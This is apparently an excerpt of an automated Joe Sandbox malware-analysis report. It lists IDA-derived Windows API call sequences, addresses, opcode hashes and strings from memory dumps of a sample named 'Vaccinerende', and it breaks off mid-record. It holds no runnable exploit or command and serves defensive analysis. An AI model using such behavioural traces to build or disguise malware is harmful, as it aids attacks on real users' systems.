                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: memcpymemset
                                                                              • String ID: gj
                                                                              • API String ID: 1297977491-4203073231
                                                                              • Opcode ID: 89e2b4c479d66d8f351294c0966a75ef3485227debcc485d945bfba73828c7b8
                                                                              • Instruction ID: b45f8a370873a883e9703370fbfe8b0477d3556cf02d11e6db591a78d085f858
                                                                              • Opcode Fuzzy Hash: 89e2b4c479d66d8f351294c0966a75ef3485227debcc485d945bfba73828c7b8
                                                                              • Instruction Fuzzy Hash: 95213DB67403002BE7209A39CC4165B7B6D9FC6318F0A481EF6464B346E67DD605C756
                                                                              APIs
                                                                                • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8EC
                                                                                • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8FA
                                                                                • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E90B
                                                                                • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E922
                                                                                • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E92B
                                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0040E961
                                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0040E974
                                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0040E987
                                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0040E99A
                                                                              • free.MSVCRT ref: 0040E9D3
                                                                                • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: ??3@$free
                                                                              • String ID:
                                                                              • API String ID: 2241099983-0
                                                                              • Opcode ID: 1a8555f46c1a3ec8b66a42d0cb8e1340db676157345f2d4bb75338048ae0e025
                                                                              • Instruction ID: 098569c1990a85f87ddbd530571c52e66e2f7ba0f471894b996c1416d461d1fd
                                                                              • Opcode Fuzzy Hash: 1a8555f46c1a3ec8b66a42d0cb8e1340db676157345f2d4bb75338048ae0e025
                                                                              • Instruction Fuzzy Hash: 5001A932A01A2097C665BB27A50195EB354BE86B24316896FF844773C1CB3C6C61C6DF
                                                                              APIs
                                                                              • AreFileApisANSI.KERNEL32 ref: 00417497
                                                                              • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 004174B7
                                                                              • malloc.MSVCRT ref: 004174BD
                                                                              • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 004174DB
                                                                              • free.MSVCRT ref: 004174E4
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: ByteCharMultiWide$ApisFilefreemalloc
                                                                              • String ID:
                                                                              • API String ID: 4053608372-0
                                                                              • Opcode ID: 731f1bc2d56076fd9335eacaa0243be786ea79a0eeca4ef4ad1c585bb51aa26c
                                                                              • Instruction ID: 68224c9aa4b31b20fa5037399352f9c2f04b40a845063e8f60522cdb36b448b3
                                                                              • Opcode Fuzzy Hash: 731f1bc2d56076fd9335eacaa0243be786ea79a0eeca4ef4ad1c585bb51aa26c
                                                                              • Instruction Fuzzy Hash: DE01A4B150412DBEAF115FA99C80CAF7E7CEA463FC721422AF514E2290DA345E405AB9
                                                                              APIs
                                                                              • GetParent.USER32(?), ref: 0040D453
                                                                              • GetWindowRect.USER32(?,?), ref: 0040D460
                                                                              • GetClientRect.USER32(00000000,?), ref: 0040D46B
                                                                              • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0040D47B
                                                                              • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 0040D497
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: Window$Rect$ClientParentPoints
                                                                              • String ID:
                                                                              • API String ID: 4247780290-0
                                                                              • Opcode ID: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                                              • Instruction ID: 8744084584fea1eb3916f9079d499296a2dd08f7759f51c0708cf8f54c9212ed
                                                                              • Opcode Fuzzy Hash: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                                              • Instruction Fuzzy Hash: 62018836801129BBDB11EBA6CC49EFFBFBCFF06310F048069F901A2180D778A5018BA5
                                                                              APIs
                                                                                • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000), ref: 004096D5
                                                                              • GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                              • ??2@YAPAXI@Z.MSVCRT ref: 004450BE
                                                                              • memset.MSVCRT ref: 004450CD
                                                                                • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                                                              • ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                                                • Part of subcall function 00444E84: memchr.MSVCRT ref: 00444EBF
                                                                                • Part of subcall function 00444E84: memcpy.MSVCRT(?,0044EB0C,0000000B,?,?,?,00000000,00000000,00000000), ref: 00444F63
                                                                                • Part of subcall function 00444E84: memcpy.MSVCRT(?,00000001,00000008,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00444F75
                                                                                • Part of subcall function 00444E84: memcpy.MSVCRT(?,?,00000010,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00444F9D
                                                                              • CloseHandle.KERNEL32(00000000), ref: 004450F7
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
                                                                              • String ID:
                                                                              • API String ID: 1471605966-0
                                                                              • Opcode ID: edfdfd5907517e88f4142de78b3de7a943e3e7aedefbd09b5ff7bb7402004b57
                                                                              • Instruction ID: af7e2442fb2a0afe256a59df9b01c6fa6c67666c78107f96d02934f32f814c95
                                                                              • Opcode Fuzzy Hash: edfdfd5907517e88f4142de78b3de7a943e3e7aedefbd09b5ff7bb7402004b57
                                                                              • Instruction Fuzzy Hash: D8F0C2765002107BE5207736AC8AEAB3A5CDF96771F11893FF416921D2EE698814C1BD
                                                                              APIs
                                                                              • wcscpy.MSVCRT ref: 0044475F
                                                                              • wcscat.MSVCRT ref: 0044476E
                                                                              • wcscat.MSVCRT ref: 0044477F
                                                                              • wcscat.MSVCRT ref: 0044478E
                                                                                • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,000000FF,?,004447C5,00000000,?,?,?,00000000,?), ref: 004099E3
                                                                                • Part of subcall function 00409A90: lstrcpyW.KERNEL32(?,?), ref: 00409AA5
                                                                                • Part of subcall function 00409A90: lstrlenW.KERNEL32(?), ref: 00409AAC
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: wcscat$lstrcpylstrlenmemcpywcscpywcslen
                                                                              • String ID: \StringFileInfo\
                                                                              • API String ID: 102104167-2245444037
                                                                              • Opcode ID: 5de2f5fc2277cc411a3074599cad155646ee2126b3ab30f355a99381f63f29ed
                                                                              • Instruction ID: e4f437c51a7ffcfb72b972a214432876dbdec8abc2c75880463b8380eb377783
                                                                              • Opcode Fuzzy Hash: 5de2f5fc2277cc411a3074599cad155646ee2126b3ab30f355a99381f63f29ed
                                                                              • Instruction Fuzzy Hash: 41018FB290021DB6EF10EAA1DC45EDF73BCAB05304F0004B7B514F2052EE38DB969B69
                                                                              APIs
                                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8EC
                                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8FA
                                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E90B
                                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E922
                                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E92B
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: ??3@
                                                                              • String ID:
                                                                              • API String ID: 613200358-0
                                                                              • Opcode ID: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                                              • Instruction ID: 8b058f36177a858601f18eb469b8e3bd7c1df3fc7b9e847ab044313c89d6339d
                                                                              • Opcode Fuzzy Hash: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                                              • Instruction Fuzzy Hash: 98F012B25047015FD760AF6AA8C491BF3E9AB597147668C3FF149D3641CB38FC508A1C
                                                                              APIs
                                                                              • GetSystemMetrics.USER32(00000000), ref: 00401990
                                                                              • GetSystemMetrics.USER32(00000001), ref: 0040199B
                                                                              • SetWindowPlacement.USER32(00000000,?), ref: 004019CC
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: MetricsSystem$PlacementWindow
                                                                              • String ID: AE
                                                                              • API String ID: 3548547718-685266089
                                                                              • Opcode ID: eb2f8e64a603564a933fd5a75b54da642a0a5aacc70f311db6863d86cb8a116d
                                                                              • Instruction ID: bc47655bc3d2af3ddac3cbb2ac08b89d1fd66a09df9f10e9f6ff2044f470f5ca
                                                                              • Opcode Fuzzy Hash: eb2f8e64a603564a933fd5a75b54da642a0a5aacc70f311db6863d86cb8a116d
                                                                              • Instruction Fuzzy Hash: 4C11AC719002099BCF20CF5EC8987EE77B5BF41308F15017ADC90BB292D670A841CB64
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: _memicmpwcslen
                                                                              • String ID: @@@@$History
                                                                              • API String ID: 1872909662-685208920
                                                                              • Opcode ID: b53e6bfe39813f40e33e088c97292d20a71445cfbc3f913cd0ff49abdb82a555
                                                                              • Instruction ID: 0314511eba11a06c501d0b319d6753a7178557fc2485e08f734f24cb460fdfed
                                                                              • Opcode Fuzzy Hash: b53e6bfe39813f40e33e088c97292d20a71445cfbc3f913cd0ff49abdb82a555
                                                                              • Instruction Fuzzy Hash: F1F0CD3310471157D210DE199C41A2BF7F8DB813A5F11063FF991A31C2D739EC658657
                                                                              APIs
                                                                              • memset.MSVCRT ref: 004100FB
                                                                              • memset.MSVCRT ref: 00410112
                                                                                • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                                                • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                                              • _snwprintf.MSVCRT ref: 00410141
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: memset$_snwprintf_wcslwrwcscpy
                                                                              • String ID: </%s>
                                                                              • API String ID: 3400436232-259020660
                                                                              • Opcode ID: 5b9d86c37e8fc893e623c972aadbd746c4d139f4edb44e4e662c1ed71a902018
                                                                              • Instruction ID: d6b380c41b5e3e458bf6abeca455f552dea24a705517b0a2e3702c553642f250
                                                                              • Opcode Fuzzy Hash: 5b9d86c37e8fc893e623c972aadbd746c4d139f4edb44e4e662c1ed71a902018
                                                                              • Instruction Fuzzy Hash: 9B01DBF3D0012977D730A755CC46FEA76ACEF45304F0000B6BB08B3186DB78DA458A99
APIs
• memset.MSVCRT ref: 0040E770
• SendMessageW.USER32(?,0000105F,00000000,?), ref: 0040E79F
Strings
Memory Dump Source
• Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
Similarity
• API ID: MessageSendmemset
• String ID: AE$"
• API String ID: 568519121-1989281832
• Opcode ID: b8b737cf360229c8c3c0ba8ae205d700f5cbc6e636b32f375fd4ccd57fc75389
• Instruction ID: 5049a961280a3e8282645b70ff0f7bf8ff78c54eb6baa8beabb6daf17925e322
• Opcode Fuzzy Hash: b8b737cf360229c8c3c0ba8ae205d700f5cbc6e636b32f375fd4ccd57fc75389
• Instruction Fuzzy Hash: A701A239900204ABEB209F5ACC81EABB7F8FF44B45F008429E854A7291D3349855CF79
APIs
• memset.MSVCRT ref: 0040D58D
• SetWindowTextW.USER32(?,?), ref: 0040D5BD
• EnumChildWindows.USER32(?,Function_0000D4F5,00000000), ref: 0040D5CD
Strings
Memory Dump Source
• Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
Similarity
• API ID: ChildEnumTextWindowWindowsmemset
• String ID: caption
• API String ID: 1523050162-4135340389
• Opcode ID: 0d93d59d75102ca4f37fb867a54fcac0e05f73641c093ad9b23abec7f1ae8059
• Instruction ID: dcfab03f3ae0740f4c11e1fd8af26e22289cdce227bdcda27870e2dbaf68b2c3
• Opcode Fuzzy Hash: 0d93d59d75102ca4f37fb867a54fcac0e05f73641c093ad9b23abec7f1ae8059
• Instruction Fuzzy Hash: 50F08131D0031876FB206B95CC4EB8A3268AB04744F000076BE04B61D2DBB8EA44C69D
APIs
  • Part of subcall function 00409BFD: memset.MSVCRT ref: 00409C07
  • Part of subcall function 00409BFD: wcscpy.MSVCRT ref: 00409C47
• CreateFontIndirectW.GDI32(?), ref: 00401156
• SendDlgItemMessageW.USER32(?,000003EC,00000030,00000000,00000000), ref: 00401175
• SendDlgItemMessageW.USER32(?,000003EE,00000030,?,00000000), ref: 00401193
Strings
Memory Dump Source
• Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
Similarity
• API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
• String ID: MS Sans Serif
• API String ID: 210187428-168460110
• Opcode ID: d52be591b3ab58c36f6074870949877e32a333ebc1fa33980d7036594a0e8467
• Instruction ID: 44e142790c58e2983bb51e892a2c7280827b5342727586ee11fe1c2be2fb852b
• Opcode Fuzzy Hash: d52be591b3ab58c36f6074870949877e32a333ebc1fa33980d7036594a0e8467
• Instruction Fuzzy Hash: 7CF082B5A4030877EB326BA1DC46F9A77BDBB44B01F040935F721B91D1D3F4A585C658
APIs
Strings
Memory Dump Source
• Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
Similarity
• API ID: ClassName_wcsicmpmemset
• String ID: edit
• API String ID: 2747424523-2167791130
• Opcode ID: da8fee05c6b158577436834c58d8e0793f5841ead652fa3e76a227b487c5742d
• Instruction ID: aa36152fd255268de381ae2120198bffa1fffac517830ea88c39a2b7b5867ff0
• Opcode Fuzzy Hash: da8fee05c6b158577436834c58d8e0793f5841ead652fa3e76a227b487c5742d
• Instruction Fuzzy Hash: 86E0D872D8031E6AFB10EBA0DC4AFA977BCFB01708F0001B6B915E10C2EBB496494A45
APIs
  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(00000000), ref: 0040A87B
  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
• GetProcAddress.KERNEL32(00000000,shlwapi.dll,750A375A,?,00405751,00000000), ref: 00414E2B
• FreeLibrary.KERNEL32(00000000,?,00405751,00000000), ref: 00414E43
Strings
Memory Dump Source
• Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
Similarity
• API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
• String ID: SHAutoComplete$shlwapi.dll
• API String ID: 3150196962-1506664499
• Opcode ID: d2abe1e6ce67af05a23a9289f1a003983cf5919859a34de4ac3658ffea157a86
• Instruction ID: 56be8aed7d941f739c6f69dc747e21d8edf2639efa9d7e462eda1ee05908af23
• Opcode Fuzzy Hash: d2abe1e6ce67af05a23a9289f1a003983cf5919859a34de4ac3658ffea157a86
• Instruction Fuzzy Hash: C1D0C2353002315BD6616B27AC04AAF2A99EFC13A1B054035F928D2210DBA84996827D
APIs
• memcpy.MSVCRT(?,00000000,00000030,00000000), ref: 0041D8A6
• memcpy.MSVCRT(?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041D8BC
• memcmp.MSVCRT ref: 0041D8CB
• memcmp.MSVCRT ref: 0041D913
• memcpy.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0041D92E
Memory Dump Source
• Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
Similarity
• API ID: memcpy$memcmp
• String ID:
• API String ID: 3384217055-0
• Opcode ID: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
• Instruction ID: f5df6941464580ef2fdae31f27b7f31021858bb2d0e37ec30fcb1df3a02010a9
• Opcode Fuzzy Hash: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
• Instruction Fuzzy Hash: 8821B2B2E10249ABDB14EA91DC46EDF73FC9B44704F01442AF512D7181EB28E644C725
APIs
Memory Dump Source
• Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
Similarity
• API ID: memset$memcpy
• String ID:
• API String ID: 368790112-0
• Opcode ID: 8ce092fd9a5e59041eb9f85ad4e05697c1cc0ba7cb52d02734991e9cdc0d3c07
• Instruction ID: abb90bdd0bd5c960a46cc99acd1c91865272cbbdb433919b32c204757dd19146
• Opcode Fuzzy Hash: 8ce092fd9a5e59041eb9f85ad4e05697c1cc0ba7cb52d02734991e9cdc0d3c07
• Instruction Fuzzy Hash: 0201FCB5740B007BF235AB35CC03F9A73A8AF52724F004A1EF153966C2DBF8A554819D
APIs
  • Part of subcall function 004019D8: GetMenu.USER32(?), ref: 004019F6
  • Part of subcall function 004019D8: GetSubMenu.USER32(00000000), ref: 004019FD
  • Part of subcall function 004019D8: EnableMenuItem.USER32(?,?,00000000), ref: 00401A15
  • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000412,?,00000000), ref: 00401A36
  • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000411,?,?), ref: 00401A5A
• GetMenu.USER32(?), ref: 00410F8D
• GetSubMenu.USER32(00000000), ref: 00410F9A
• GetSubMenu.USER32(00000000), ref: 00410F9D
• CheckMenuRadioItem.USER32(00000000,0000B284,0000B287,?,00000000), ref: 00410FA9
Memory Dump Source
• Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
Similarity
• API ID: Menu$ItemMessageSend$CheckEnableRadio
• String ID:
• API String ID: 1889144086-0
• Opcode ID: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
• Instruction ID: be5000c07a60ff25a23af51018491178d5f127676f18bd69b4cc56e9e4830f27
• Opcode Fuzzy Hash: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
• Instruction Fuzzy Hash: D5517171B40704BFEB20AB66CD4AF9FBAB9EB44704F00046EB249B72E2C6756D50DB54
APIs
• CreateFileMappingW.KERNEL32(?,00000000,00000004,00000000,?,00000000), ref: 004180B8
• MapViewOfFile.KERNEL32(00000000,00000006,00000000,?,?), ref: 004180E3
• GetLastError.KERNEL32 ref: 0041810A
• CloseHandle.KERNEL32(00000000), ref: 00418120
Memory Dump Source
• Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
Similarity
• API ID: File$CloseCreateErrorHandleLastMappingView
• String ID:
• API String ID: 1661045500-0
• Opcode ID: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
• Instruction ID: 5cb71d9443798353a032a6b226e7c46d85178154149a60e532078a3cdb21b7c8
